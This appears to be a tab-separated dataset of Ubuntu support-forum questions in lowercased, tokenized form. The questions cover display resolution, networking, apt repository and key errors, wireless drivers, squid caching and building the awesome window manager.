57272	is there a way set my resolution to 1600x1200 without a monitor plugged in ?	i know how to modify xorg.conf and get it to start at about 1024x768 , but i ca n't get it to start at 1600x1200 . it is quite an inconvenience to have to go and manually start them up each time . we are using these servers as automation agents . we are browser testing using sikuli so we ca n't go headless .
57277	how do i access machines on the home network with their machine name ?	i have all machines connecting to the internet through a wireless router ( occasionally i plug a machine into the router via cable ) . i have installed the ssh package and can access one ubuntu machine from another using , for example , `` ssh 10.0.0.2 '' . however , the local ip addresses change as machines are switched off and on and reconnect to the router , so i 'd prefer to use `` ssh machinename '' . if i do type `` ssh machinename '' , nothing happens , no error , no returning to the prompt . what do i need to install/configure to access ubuntu machines via their machine name ? ( as a side note , i have samba installed so i can access windows machines on the same network . i have set name resolve order = lmhosts wins bcast host because i use opendns , i 'm not sure if this could affect ubuntu networking . name-based resolution works in both directions between windows and ubuntu ( for example , connecting to an ubuntu machine with winscp ) . )
57292	nm-applet 's vpn menu disappears	i spend my days hopping between vpn connections in ubuntu 10.10 and this is becoming severely annoying . what happens is that every once in a while - typically several times a day - when i click on the networking icon in the top bar , the nm-applet 's vpn connections flyout menu is gone . ( said menu item is still there , it just does n't have a submenu or do anything when clicked . ) every time i killall nm-applet and start it again , which usually brings the menu back . has anybody here experienced this and been able to fix it ?
57297	why has /var/run been migrated to /run ?	from the technical overview of ubuntu 11.10 oneiric : ubuntu 11.10 has migrated away from /var/run , /var/lock and /dev/shm and now uses /run , /run/lock and /run/shm instead ( respectively ) . i hardcode these paths in my applications , why is this change made to oneiric ? what can i do to make my applications backwards- and forward-compatible ? is there a better way other than checking first for the existence of /run , and then /var/run ?
57298	installing windows after ubuntu on a separate hdd ?	i have ubuntu 11.04 installed on my machine and i would like to install windows 7 as well . i heard that windows 7 creates an additional partition along with the normal one and i was afraid that this might overwrite some of my ext3 partitions . to avoid this risk i 'm thinking of installing windows 7 on a separate drive . will windows affect the mbr if they are installed on a separate drive ? do i have to edit grub after installing windows ? is there any safe/easy method to do so ?
57299	how do i create application launchers in gnome panel	i currently use individual application launchers to create something like below for the apps i commonly use they are tedious to create/modify as i have to move/modify 1 by 1 - is there a better way ? update : i am using ubuntu classic , the launchers are added by `` right click panel > add to panel > application launcher ''
57305	packages.gz naming convention	can someone provide a script that can fetch package information ( name , depends , etc . ) from the packages repository file ( s ) ? or can someone tell what the naming convention is for the packages file ? let me explain . when we give the command apt-get update it fetches a packages.gz file from the web which contains each package 's information . i need to fetch information for each package from that file . or i could use a tutorial link instead . note : it is not a homework : )
57307	ca n't find u1 folder in my windows `` my documents ''	i just installed u1 on windows vista ( spanish language ) and when i ask it to `` open synced folders '' it opens `` user '' /documentos but there is no `` ubuntu one '' folder . should i create it ? i 'm worried about u1 uploading my whole documentos ( my documents in spanish windows ) .
57309	where can i find a comprehensive list of compatible usb devices ?	i need a ubuntu compatible video grabber for usb , composite/s-video + analog audio . most has compatibility with windows/macos listed on the manufacturer/retailers homepage but i need to check if ubuntu is supported before i buy . i know that ubuntu supports many devices on the chip set level so what the manufacturer states regarding ubuntu compatibility is not necessarily final . i checked this compatibility database mentioned in an answer to another question regarding audio card compatibility but that list did not seem comprehensive . e.g it did not list the dlink dub-e100 usb2.0 ethernet adapter that i successfully have used on my ubuntu 11.04 laptop .
57314	logitech webcam pro 9000 only works when motion is run as root	so i have a logitech webcam pro 9000 under 10.04 and i am trying to get it to work with motion . here is the lsbusb output : bus 003 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 002 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 001 device 008 : id 046d:0809 logitech , inc . bus 001 device 005 : id 15a9:0004 bus 001 device 004 : id 058f:6362 alcor micro corp. hi-speed 21-in-1 flash card reader/writer ( internal/external ) bus 001 device 002 : id 1058:0910 western digital technologies , inc . bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub when i run motion as user `` motion '' it does n't work and i keep getting a failed to open video device /dev/video0 error . however , when i run it as root , there is no problem and everything works fine . i have a laptop running the same setup for motion and everything seems to work fine e.g . all the permissions on the files and the device are the same . any thoughts ?
57316	how do i install java 5 ?	i followed the approach for ubuntu 9.10 , to install java 5 but it is saying after executing the command update , e : could not get lock /var/lib/apt/lists/lock - open ( 11 : resource temporarily unavailable ) and some times , some index files failed to download , they have been ignored , or old ones used instead . approach : gksu gedit /etc/apt/sources.list and add : deb http : //us.archive.ubuntu.com/ubuntu/ jaunty multiverse deb http : //us.archive.ubuntu.com/ubuntu/ jaunty-updates multiverse save the file and close gedit . next sync your sources by running sudo apt-get update and install sudo apt-get install sun-java5-
57319	analog and digital audio output at the same time	my speakers use a digital input , but my headphones use an analog input . i have them both plugged in , and when i want to use the headphones i just turn off the speakers and switch on the headphones . i know that simultaneous output on digital and analog is supported by the hardware , because it worked fine in windows xp . but on ubuntu , i seem to only get one at a time , depending on which setting is selected in the combo box located at system - > preferences - > sound - > hardware . how can i get simultaneous analog and digital output without having to switch the profile every time ? i 'm on ubuntu 11.04 and it 's an hda intel chip .
57324	why ca n't i install freepascal and the gold linker at the same time ?	i develop in haskell privatly , but for school i have to use delphi ( i am allowed to use lazarus though ) . to speed up linking in ghc ( the compiler for haskell ) i installed binutilus-gold . but now , when i try to install lazarus , i get a conflicting package : binutils-gold . does anybody knows , how to install both at the same time ?
57326	where is the ppa sources config file ?	i have added three ppas . how do i backup their configuration ? where is the ppa config file ?
57336	minimal system or minimal virtual machine on install ?	i 've been thinking a lot about this lately and have n't been able to find any good documentation online that explains this : when installing ubuntu server , i can choose between minimal system and minimal virtual machine by hitting the f4 button at the install screen . why should i choose one over the other ?
57339	connect/disconnect from vpn from the command line	i have two vpns setup on my ubuntu machine , one using vpnc and one using pptp . these were both setup using the gnome network manager interfaces and work great . however on occasion i need to access this machine remotely - is there a way to connect or disconnect to these vpns from the command line ?
57341	how do i disable the vga16fb module during ubuntu server setup ?	i have used the instructions given in the following link to fix the slow hyper-v console of a ubuntu server box . http : //solyaris.wordpress.com/2010/05/01/ubuntu-10-04-on-intel-driver-and-server-frame-buffer/ i am hoping that there is a way to fix the problem before the install so that the installation routine wo n't take so long .
57342	how do i setup a timer based notification ?	being a compulsive computer user , i am in front of it all day . i sometimes lose track of time when i am working on my comp . i need a notification service to alert me of the current time , either by a popup notification or a sound being played or both . for the popup , i found the free desktop notification standard which uses a dbus api . i was able to create a notification using dfeet , a graphical dbus explorer . i used the following arguments : '' wakeup '' , 1234 , `` '' , `` the time is '' , `` 9pm '' , [ ] , [ ] , 1 it works fine so far , but how can i take it further from here ? how do i invoke this from the command-line ? how do i automate this command ? is cron still the recommended way of automating time based actions ? how do i play sounds along with the popup ? either via the freedesktop api or via a media player ? a complete solution would be appreciated and perhaps useful to others too .
57345	finding a display driver	sorry if i have missed a relevant posting . i have run edubuntu 11.04 successfully on an old laptop from a live dvd while xp was installed on the system along with ubuntu 10.10 . i then installed edubuntu , wiping everything else on the drive , but now i get one and a half 640x480 desktops , with no option to increase the resolution and no monitors detected . unfortunately the laptop is a generic from a company called novatech and i can not find the relevant info on the hardware . i had system info with xp but obviously that 's not available now . i would dearly love to migrate to linux , and this is the latest in a string of `` almost made it '' episodes for me so i would greatly appreciate any help . thanks in advance
57346	package dependencies error in almost every install	new to ubuntu . in the other sofware sources i have `` debian 4.0 eth '' officially supported `` non-us.debian.org/ '' ; etc ... `` ppa.launcpad.net '' and installing applications has stopped working . i think i first came across this problem after installing blender 2.58 when using update manager it is prompting for a partial upgrade . almost every software when trying to install showing the same error package dependencies error or gpg pub key missing , tried to fixing to them but no luck . output to : sudo apt-get update & & sudo apt-get upgrade ( links disabled http : // -- http : / as new user ca n't put more no . of hyperlinks ) ign http : /non-us.debian.org stable/non-us inrelease ign http : /non-us.debian.org stable/non-us release.gpg ign http : /non-us.debian.org stable/non-us release ign http : /non-us.debian.org stable/non-us/contrib translationindex ign http : /non-us.debian.org stable/non-us/main translationindex ign http : /non-us.debian.org stable/non-us/non-free translationindex err http : /non-us.debian.org stable/non-us/main sources 503 service unavailable err http : /non-us.debian.org stable/non-us/contrib sources 503 service unavailable err http : /non-us.debian.org stable/non-us/non-free sources 503 service unavailable err http : /non-us.debian.org stable/non-us/main amd64 packages 503 service unavailable err http : /non-us.debian.org stable/non-us/contrib amd64 packages 503 service unavailable err http : /non-us.debian.org stable/non-us/non-free amd64 packages 503 service unavailable ign http : /non-us.debian.org stable/non-us/contrib translation-en_in ign http : /non-us.debian.org stable/non-us/contrib translation-en ign http : /non-us.debian.org stable/non-us/main translation-en_in ign http : /non-us.debian.org stable/non-us/main translation-en ign http : /non-us.debian.org stable/non-us/non-free translation-en_in ign http : /non-us.debian.org stable/non-us/non-free translation-en ign http : /archive.ubuntu.com natty inrelease ign http : /archive.canonical.com natty inrelease ign http : /extras.ubuntu.com natty inrelease ign http : /http.us.debian.org stable inrelease ign http : /ftp.us.debian.org etch inrelease ign http : /archive.ubuntu.com natty-updates inrelease hit http : /archive.canonical.com natty release.gpg get:1 http : /extras.ubuntu.com natty release.gpg [ 72 b ] ign http : /ppa.launchpad.net natty inrelease get:2 http : /http.us.debian.org stable release.gpg [ 1,672 b ] ign http : /linux.dropbox.com natty inrelease ign http : /ftp.us.debian.org etch release.gpg ign http : /archive.ubuntu.com natty-security inrelease hit http : /archive.canonical.com natty release hit http : /extras.ubuntu.com natty release ign http : /ppa.launchpad.net natty inrelease get:3 http : /linux.dropbox.com natty release.gpg [ 489 b ] ign http : /ftp.us.debian.org etch release ign http : /dl.google.com stable inrelease get:4 http : /archive.ubuntu.com natty release.gpg [ 198 b ] ign http : /ppa.launchpad.net natty inrelease hit http : /archive.canonical.com natty/partner sources hit http : /extras.ubuntu.com natty/main sources get:5 http : /linux.dropbox.com natty release [ 2,599 b ] get:6 http : /archive.ubuntu.com natty-updates release.gpg [ 198 b ] ign http : /ppa.launchpad.net natty inrelease hit http : /archive.canonical.com natty/partner amd64 packages hit http : /extras.ubuntu.com natty/main amd64 packages get:7 http : /linux.dropbox.com natty/main amd64 packages [ 784 b ] get:8 http : /archive.ubuntu.com natty-security release.gpg [ 198 b ] ign http : /ppa.launchpad.net natty inrelease ign http : /archive.canonical.com natty/partner translationindex ign http : /extras.ubuntu.com natty/main translationindex get:9 http : /http.us.debian.org stable release [ 104 kb ] ign http : /linux.dropbox.com natty/main translationindex hit http : /archive.ubuntu.com natty release ign http : /ppa.launchpad.net natty inrelease ign http : /http.us.debian.org stable release hit http : /archive.ubuntu.com natty-updates release get:10 http : /ppa.launchpad.net natty inrelease [ 316 b ] ign http : /ppa.launchpad.net natty inrelease hit http : /archive.ubuntu.com natty-security release get:11 http : /ppa.launchpad.net natty inrelease [ 316 b ] ign http : /ppa.launchpad.net natty inrelease hit http : /archive.ubuntu.com natty/restricted sources get:12 http : /ppa.launchpad.net natty release.gpg [ 316 b ] ign http : /http.us.debian.org stable/main sources/diffindex get:13 http : /ppa.launchpad.net natty release.gpg [ 316 b ] hit http : /archive.ubuntu.com natty/main sources ign http : /ftp.us.debian.org etch/contrib translationindex ign http : /http.us.debian.org stable/contrib sources/diffindex get:14 http : /ppa.launchpad.net natty release.gpg [ 1,502 b ] ign http : /http.us.debian.org stable/non-free sources/diffindex ign http : /ftp.us.debian.org etch/main translationindex get:15 http : /ppa.launchpad.net natty release.gpg [ 1,928 b ] ign http : /http.us.debian.org stable/main amd64 packages/diffindex ign http : /ftp.us.debian.org etch/non-free translationindex ign http : /ppa.launchpad.net natty release.gpg hit http : /http.us.debian.org stable/contrib amd64 packages/diffindex w : gpg error : http : /http.us.debian.org stable release : the following signatures could n't be verified because the public key is not available : no_pubkey aed4b06f473041fa no_pubkey 64481591b98321f9 w : gpg error : http : /ppa.launchpad.net natty inrelease : file /var/lib/apt/lists/partial/ppa.launchpad.net_sunab_kdenlive-release_ubuntu_dists_natty_inrelease does n't start with a clearsigned message w : gpg error : http : /ppa.launchpad.net natty inrelease : file /var/lib/apt/lists/partial/ppa.launchpad.net_ubuntu-wine_ppa_ubuntu_dists_natty_inrelease does n't start with a clearsigned message e : could not open file /var/lib/apt/lists/http.us.debian.org_debian_dists_stable_contrib_binary-amd64_packages.indexdiff - open ( 2 : no such file or directory ) output to : sudo cat /etc/apt/sources.list # deb cdrom : [ ubuntu 11.04 _natty narwhal_ - release amd64 ( 20110427.1 ) ] / natty main restricted # see http : /help.ubuntu.com/community/upgradenotes for how to upgrade to # newer versions of the distribution . deb http : /archive.ubuntu.com/ubuntu natty main restricted deb-src http : /archive.ubuntu.com/ubuntu natty restricted main multiverse universe # added by software-properties # # major bug fix updates produced after the final release of the # # distribution . deb http : /archive.ubuntu.com/ubuntu natty-updates main restricted deb-src http : /archive.ubuntu.com/ubuntu natty-updates restricted main multiverse universe # added by software-properties # # n.b . software from this repository is entirely unsupported by the ubuntu # # team . also , please note that software in universe will not receive any # # review or updates from the ubuntu security team . deb http : /archive.ubuntu.com/ubuntu natty universe deb http : /archive.ubuntu.com/ubuntu natty-updates universe # # n.b . software from this repository is entirely unsupported by the ubuntu # # team , and may not be under a free licence . please satisfy yourself as to # # your rights to use the software . also , please note that software in # # multiverse will not receive any review or updates from the ubuntu # # security team . deb http : /archive.ubuntu.com/ubuntu natty multiverse deb http : /archive.ubuntu.com/ubuntu natty-updates multiverse # # uncomment the following two lines to add software from the 'backports' # # repository . # # n.b . software from this repository may not have been tested as # # extensively as that contained in the main release , although it includes # # newer versions of some applications which may provide useful features . # # also , please note that software in backports will not receive any review # # or updates from the ubuntu security team . # deb http : /us.archive.ubuntu.com/ubuntu/ natty-backports main restricted universe multiverse # deb-src http : /us.archive.ubuntu.com/ubuntu/ natty-backports main restricted universe multiverse deb http : /archive.ubuntu.com/ubuntu natty-security main restricted deb-src http : /archive.ubuntu.com/ubuntu natty-security restricted main multiverse universe # added by software-properties deb http : /archive.ubuntu.com/ubuntu natty-security universe deb http : /archive.ubuntu.com/ubuntu natty-security multiverse # # uncomment the following two lines to add software from canonical's # # 'partner ' repository . # # this software is not part of ubuntu , but is offered by canonical and the # # respective vendors as a service to ubuntu users . deb http : /archive.canonical.com/ubuntu natty partner deb-src http : /archive.canonical.com/ubuntu natty partner # # this software is not part of ubuntu , but is offered by third-party # # developers who want to ship their latest software . deb http : /extras.ubuntu.com/ubuntu natty main deb-src http : /extras.ubuntu.com/ubuntu natty main deb http : /ftp.us.debian.org/debian/ etch main contrib non-free deb-src http : /ftp.us.debian.org/debian/ etch main contrib non-free deb http : /http.us.debian.org/debian stable main contrib non-free deb-src http : /http.us.debian.org/debian stable main contrib non-free deb http : /non-us.debian.org/debian-non-us stable/non-us main contrib non-free deb-src http : /non-us.debian.org/debian-non-us stable/non-us main contrib non-free thanks but after removing debian repositories still getting this error : w : gpg error : http : //ppa.launchpad.net natty release : the following signatures could n't be verified because the public key is not available : no_pubkey 9bdb3d89ce49ec21 , w : gpg error : http : //ppa.launchpad.net natty release : the following signatures could n't be verified because the public key is not available : no_pubkey 80e7349a06ed541c , w : gpg error : http : //ppa.launchpad.net natty release : the following signatures could n't be verified because the public key is not available : no_pubkey 8c851674f96fd737 , w : gpg error : http : //ppa.launchpad.net natty release : the following signatures could n't be verified because the public key is not available : no_pubkey 94e58c34a8670e8c , e : unable to parse package file /var/lib/apt/lists/partial/archive.ubuntu.com_ubuntu_dists_natty-updates_multiverse_i18n_index ( 1 ) i actually tried this before , but i am always getting this error -- executing : gpg -- ignore-time-conflict -- no-options -- no-default-keyring -- secret-keyring /etc/apt/secring.gpg -- trustdb-name /etc/apt/trustdb.gpg -- keyring /etc/apt/trusted.gpg -- primary-keyring /etc/apt/trusted.gpg -- keyserver keyserver.ubuntu.com -- recv-keys 8c851674f96fd737 gpg : requesting key f96fd737 from hkp server keyserver.ubuntu.com ? : keyserver.ubuntu.com : connection refused gpgkeys : http fetch error 7 : could n't connect : connection refused gpg : no valid openpgp data found . gpg : total number processed : 0
57347	why does my 2200bg [ calexico2 ] wireless always disconnect after a few minutes of use ?	i am having problem with my wireless connection in ubuntu 11.04 . initially it was working but now it gets disconnected after a few minutes . i then tried to install wireless backports but i think it was not proper . now wireless does not get connect not even once . it is fine with ubuntu 10.10 . my network description : *-network:0 description : wireless interface product : pro/wireless 2200bg [ calexico2 ] network connection vendor : intel corporation physical id : 2 bus info : pci @ 0000:02:02.0 logical name : eth1 version : 05 serial : 00:13 : ce:47:20 : b9 width : 32 bits clock : 33mhz capabilities : pm bus_master cap_list ethernet physical wireless configuration : broadcast=yes driver=ipw2200 driverversion=1.2.2kmprq firmware=abg:9.0.5.27 ( dec 12 2007 ) latency=64 link=no maxlatency=24 mingnt=3 multicast=yes wireless=ieee 802.11bg resources : irq:11 memory : d0200000-d0200fff *-network:1 description : ethernet interface product : 82801db pro/100 ve ( mob ) ethernet controller vendor : intel corporation physical id : 8 bus info : pci @ 0000:02:08.0 logical name : eth0 version : 81 serial : 00:11:25 : d7 : e1 : e0 size : 100mbit/s capacity : 100mbit/s width : 32 bits clock : 33mhz capabilities : pm bus_master cap_list ethernet physical tp mii 10bt 10bt-fd 100bt 100bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=e100 driverversion=3.5.24-k2-napi duplex=full firmware=n/a ip=192.168.1.3 latency=66 link=yes maxlatency=56 mingnt=8 multicast=yes port=mii speed=100mbit/s resources : irq:11 memory : d0201000-d0201fff ioport:7000 ( size=64 )
57348	refer to folders using /dev/sd # /*	can we bind folders with their directories described with the drive names ? for example : /dev/sda1/folder
57350	disable screensaver while watching flash videos	i generally watch lot of lengthy videos on youtube . i always experience a problem because the screensaver is activated every 5 minutes . i would like to know how to disable the screensaver while watching flash videos . i know , that i can change the screensaver timer or completely disable the screensaver . but i do n't want to do that . i just want to disable it while i am watching full screen videos on my browser . update : i am using google chrome .
57359	high resolution in thinkpad t60 with ati x1400	i salvaged good old t60 machine , with ati x1400 and hi resolution screen ( 1600x1200 ) . my problem is that ubuntu does not detect higher resolutions than 1024x768 . i can that radeon driver is sed ( xserver-xorg-video-radeon ) . when i install fglrx drivers , the systems seems not to see 3d acceleration at all , legacy gnome starts and still ca n't change the resolution . additionally xrandr shows , look at maximum ... it is something wrong . tdi @ congruence : ~ $ xrandr screen 0 : minimum 320 x 200 , current 1024 x 768 , maximum 8192 x 8192 vga-0 disconnected ( normal left inverted right x axis y axis ) lvds connected 1024x768+0+0 ( normal left inverted right x axis y axis ) 285mm x 214mm 1024x768 60.0*+ 800x600 59.9 848x480 59.7 720x480 59.7 640x480 59.4 dvi-0 disconnected ( normal left inverted right x axis y axis ) has anybody encountered such a problem before ? probably ati x1400 issue , not thinkpad .
57360	wubi install can not see/connect to any wifi ?	i installed 11.0`4 via wubi on my new acer aspire 7551g-7606 . when i boot it up it can not detect wifi . as a matter of fact , the `` enable wifi '' checkbox in the dropdown is disabled and when i enable it i can not see any wifi networks even though they are there ( i 'm on one right now ) when i run through the system testing app the first time `` detecting your network controller ( s ) '' worked fine but `` testing your connection to the internet '' resulted in an error . stepping back and then forward again and even restarting my system and re-running the system testing app results in `` detecting your network controller '' coming up empty . i 've installed via wubi several times including to a very similar acer aspire 7740-5691 and never had any problems whatsoever . everything works great in windows , according to windows devices i have an atheros ar5b97 . as per the comment i ran lspci which reports network controller : atheros communications inc. ar9287 wireless network adapter ( pci-express ) ( rev 01 ) sudo lshw -class network recognizes it as *-network disabled description : wireless interface product : ar9287 wireless network adapter ( pci-express ) vendor : atheros communications inc. physical id : 0 bus info : pci @ 0000:06:00.0 logical name : wlan0 version : 01 serial : the-number width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list enternet physical wireless configureation : broadcast=yes driver=ath9k driverversion=2.6.38-8-generic firmware=n/a latency=0 link=no multicast=yes wireless=ieee 802.11bgn resources : irq : 17 memory : d0200000-d020ffff rfkill list 0 : acer-wireless : wireless lan soft blocked : yes hard blocked : no 1 : phy0 : wirless lan soft blocked : no hard blocked : no what would my next step be in trying to fix this issue ?
57363	synaptics touch pad + three button tap	in windows 7 when i tap my touch pad three times my browser navigates backwards . can this fucntionality be replicated in ubuntu 11 ?
57364	how to install xfce ( xubuntu ) from ubuntu without uninstalling ubuntu-desktop	how can i install xubuntu ( xfce ) in ubuntu without uninstalling the ubuntu-desktop component . the same way as installing kubuntu but having the option to change between desktops ( kde or gnome ) . if i try to install xubuntu-desktop it tells me it wants to remove ubuntu-desktop and the notify-osd .
57369	use `less` to view big ( multi-gigabyte ) csv files	i have a big ( multi-gigabyte ) csv file , which i am viewing with a puny computer . i would like to view my file using less or some command like it which does n't have to read the whole file at once to show me part of it . is there a command out there which can show me my file in comma-aligned columns ?
57374	when are we going to get firefox 6 in official natty repositories ?	just checked , firefox 6 is out there now http : //www.mozilla.com/en-us/firefox/new/ , when we can expect it in official repositories of natty if at all ?
57375	can i use a dual boot and vm with the same installation ?	i have been running ubuntu inside a vm for the past 6 months or so , but i am struggling to get great performance out of it . my goal is to be able to setup a dual boot of windows and ubuntu , so that when i really need performance i can just boot into ubuntu , but for other times when i need to use windows , i can still pop open the boot instance of ubuntu in a vm . is this possible ? i have done this in parallels for mac , but i 'm not aware of anything that will allow me to do this in windows .
57379	dockmanager helper for thunderbird	can i find anywhere a dockmanager helper ( for use with dockbarx , docky and awn ) for thunderbird ?
57381	how to stop mysql from running at boot time ?	how could i stop mysql from running at boot time ? is there any gui for that or this must be done through console ? it 's ubuntu 10.10
57385	chrome quick list open specific website	i have managed to get quick list showing for chrome , however i would like to add a link which opens chrome and goes to a certain website . how can this be achieved ? x-ayatana-desktop-shortcuts=newwindow ; incognito ; [ newwindow shortcut group ] name=new window exec=google-chrome targetenvironment=unity [ incognito shortcut group ] name=new incognito window exec=google-chrome -- incognito targetenvironment=unity
57392	usb sound not working in wine	okay , for some reason , my usb speakers ( which work perfectly fine in ubuntu ) do n't work with wine , but my monitor speakers ( which are n't usb ) do work with wine ? is there some way to fix this ? thanks !
57395	squid has `` sum hash mismatch '' errors with bz2 files	ive been experiencing problems with my squid3 recently , i am using 10.04.3 lts . configured squid as always have been configuring since 8.04.04 , but its not working as it should be . ive been having issues with bz2 files , in my lan when i try to do an apt-get update , it just says some indexex could not be downloaded cause of a sum hash mismatch . if you check squid log , for that kind of file it says tcp_refresh_unmodified/206 google around i read thats ssquid cache keeppin the files more than usual , so i add this hoping to solve the problem : refresh_pattern -i \.bz2 $ 0 0 % 60 override-lastmod refresh-ims override-expire i dont know if thats well written or not , but it doesnt have solve the problem , and know squid log shows , tcp_refresh_unmodified/304 but the same behaviour of the hash sum mismatch , please if someone could throw a ligth in here . the only fix to this problem so far is deleting all cache and recreate it every morning , which is far from a solution . any help will be greatly apreciate it . regards .
57398	logitec webcam for notebooks deluxe	im using a logitec webcam for notebooks deluxe , i want to know why on some sites , i can not go cam to cam with other host , they do n't see or hear me . i have n't tried skype , but cam works fine with windows 7 , but i rather use ubuntu , much faster video with webcam . can someone please help me , does it work for all sites or not ? ?
57400	why does my screen flicker whenever i 'm in a 3d program ?	i just built a new computer and installed 11.04 on it . all was perfect for a few days , then this morning , supertuxcart and minecraft ( both 3d and the only 3d programs on this machine , coincidence ? ) both started flickering really bad , but only those . what causes this and how can i fix it ? per the comments : did this suddenly happen ? yes , those programs were running fine one day , flickering the next . were these programs running fine before ? yes , perfectly . what did you do different ? ( installed/removed drivers/applications , changed hardware , etc . ) i had not made any changes in the 2 days it had been built because everything had been running fine . what are your gpu specs ? $ lspci -v 01:05.0 vga compatible controller : ati technologies inc rs880 [ radeon hd 4250 ] ( prog-if 00 [ vga controller ] ) subsystem : micro-star international co. , ltd. device 7596 flags : bus master , fast devsel , latency 0 , irq 18 memory at d0000000 ( 32-bit , prefetchable ) [ size=256m ] i/o ports at d000 [ size=256 ] memory at feaf0000 ( 32-bit , non-prefetchable ) [ size=64k ] memory at fe900000 ( 32-bit , non-prefetchable ) [ size=1m ] expansion rom at < unassigned > [ disabled ] capabilities : < access denied > kernel driver in use : fglrx_pci kernel modules : fglrx , radeon
57403	recovering `` my pictures '' folder on windows using ubuntu	my windows partition got infected with a virus so i ca n't boot in windows . i am trying to recover some documents from the windows partition by booting ubuntu on my dual boot system . i was successful in easily recovering some files from my desktop . however , i ca n't get the files from my pictures folder . here 's what i see ( after blocking the username ) : root @ ubuntu : ~ # ls -alth /host/users/xxxxx/documents/my* lrwxrwxrwx 2 root root 116 2010-12-06 09:09 /host/users/xxxxx/documents/my videos - > /root/users/xxxxx/videos lrwxrwxrwx 2 root root 124 2010-12-06 09:09 /host/users/xxxxx/documents/my pictures - > /root/users/xxxxx/pictures lrwxrwxrwx 2 root root 112 2010-12-06 09:09 /host/users/xxxxx/documents/my music - > /root/users/xxxx/music root @ ubuntu : ~ # cd /host/users/xxxxx/documents/my\ pictures bash : cd : /host/users/xxxxx/documents/my pictures : no such file or directory root @ ubuntu : ~ # cd /root root @ ubuntu : ~ # ls root @ ubuntu : ~ # if i try to open it by clicking it in ubuntu 's places window , it displays a window saying the link `` my pictures '' is broken . move it to trash ? this link can not be used , because its target `` /root/users/xxxxx/pictures '' does n't exist . how can i access my pictures ? update : i have a wubi installation . firther , if i look in /host/users/xxxx/pictures : root @ ubuntu : ~ # cd /host/users/xxxxx/pictures/ root @ ubuntu : /host/users/xxxxx/pictures # ls -alth total 29k drwxrwxrwx 1 root root 28k 2011-08-13 13:58 .. drwxrwxrwx 1 root root 0 2011-05-01 16:07 . -rwxrwxrwx 1 root root 504 2011-05-01 16:07 desktop.ini root @ ubuntu : /host/users/xxxxxpictures # cat desktop.ini �� [ .shellclassinfo ] localizedresourcename= @ % systemroot % \system32\shell32.dll , -21779 infotip= @ % systemroot % \system32\shell32.dll , -12688 iconresource= % systemroot % \system32\imageres.dll , -113 iconfile= % systemroot % \system32\shell32.dll iconindex=-236
57405	fglrx radeon hd 4550 xorg.conf tweaks 2d performance	i am having horrible problems with my 2d performance on my radeon hd 4550 using the fglrx driver ( the open source is somewhat better , but i need fglrx support for 3d ) . it has established a xorg.conf file in the system , and there is hardly anything in there . so i was wondering if there are any tweaks i can apply to it , to boost 2d , and potentially even 3d performance higher . thank you
57407	why does ubuntu crash when i suspend or close my lid ?	whenever i close my lid , or manually suspend , ubuntu wo n't go back to normal and the caps lock key randomly blinks . how can i fix this ? i really want to be able to close my lid without leaving my laptop on .
57420	the scroll wheels on all of my mice are unresponsive , how can i fix this ?	i 've tried a few different mice and all exhibit the same issue : only about two fifths of the `` ticks '' from each mouse 's scroll wheel actually do anything . distressingly , it seems to be random . sometimes , i 'll get a wonderful string of three or four ticks in a row that work ; other times , seven or eight ticks in a row do nothing . all of the mice i 've tried work perfectly on my windows netbook and on a friend 's macbook . what do i need to configure to make my scroll wheels behave ? one of the mice is brand new , and all the mice are from logitech or microsoft , if that makes any difference .
57421	building awesome wm , missing dependencies	trying to compile awesome window manager on 11.04 , i 've done apt-get build-dep awesome but still get errors about missing dependencies : $ make running cmakeâś -- cat - > /bin/cat -- ln - > /bin/ln -- grep - > /bin/grep -- git - > /usr/bin/git -- hostname - > /bin/hostname -- asciidoc - > /usr/bin/asciidoc -- xmlto - > /usr/bin/xmlto -- gzip - > /bin/gzip -- lua - > /usr/bin/lua -- luadoc - > /usr/bin/luadoc -- convert - > /usr/bin/convert -- checking for modules 'glib-2.0 ; cairo ; x11 ; oocairo ; oopango ; xcb-randr ; xcb-xtest ; xcb-xinerama ; xcb-util > =0.3.8 ; xcb-keysyms > =0.3.4 ; xcb-icccm > =0.3.8 ; xcb-image > =0.3.0 ; cairo-xcb ; libstartup-notification-1.0 > =0.10 ; xproto > =7.0.15 ; libxdg-basedir > =1.0.0' -- package 'oocairo ' not found -- package 'oopango ' not found -- package 'xcb-util > =0.3.8 ' not found -- package 'xcb-icccm > =0.3.8 ' not found cmake error at /usr/share/cmake-2.8/modules/findpkgconfig.cmake:266 ( message ) : a required package was not found i do n't see any sign of these libraries in the repos . i tried the instructions at http : //ubuntuforums.org/showthread.php ? t=960841 and that also fails : $ cd util & & ./autogen.sh & & make & & sudo make install autoreconf : entering directory ` . ' autoreconf : configure.ac : not using gettext autoreconf : running : aclocal -i m4 autoreconf : configure.ac : tracing autoreconf : configure.ac : not using libtool autoreconf : running : /usr/bin/autoconf autoreconf : configure.ac : not using autoheader autoreconf : running : automake -- add-missing -- copy -- no-force configure.ac:5 : installing `./install-sh' configure.ac:5 : installing `./missing' src/makefile.am:1 : libtool library used but `libtool ' is undefined src/makefile.am:1 : the usual way to define `libtool ' is to add `ac_prog_libtool' src/makefile.am:1 : to `configure.ac ' and run `aclocal ' and `autoconf ' again . src/makefile.am:1 : if `ac_prog_libtool ' is in `configure.ac ' , make sure src/makefile.am:1 : its definition is in aclocal 's search path . src/makefile.am : installing `./depcomp' src/makefile.am:13 : `xcbinclude_headers ' is used but `xcbincludedir ' is undefined makefile.am:6 : `pkgconfig_data ' is used but `pkgconfigdir ' is undefined autoreconf : automake failed with exit status : 1 what do i need to do to be able to compile ?
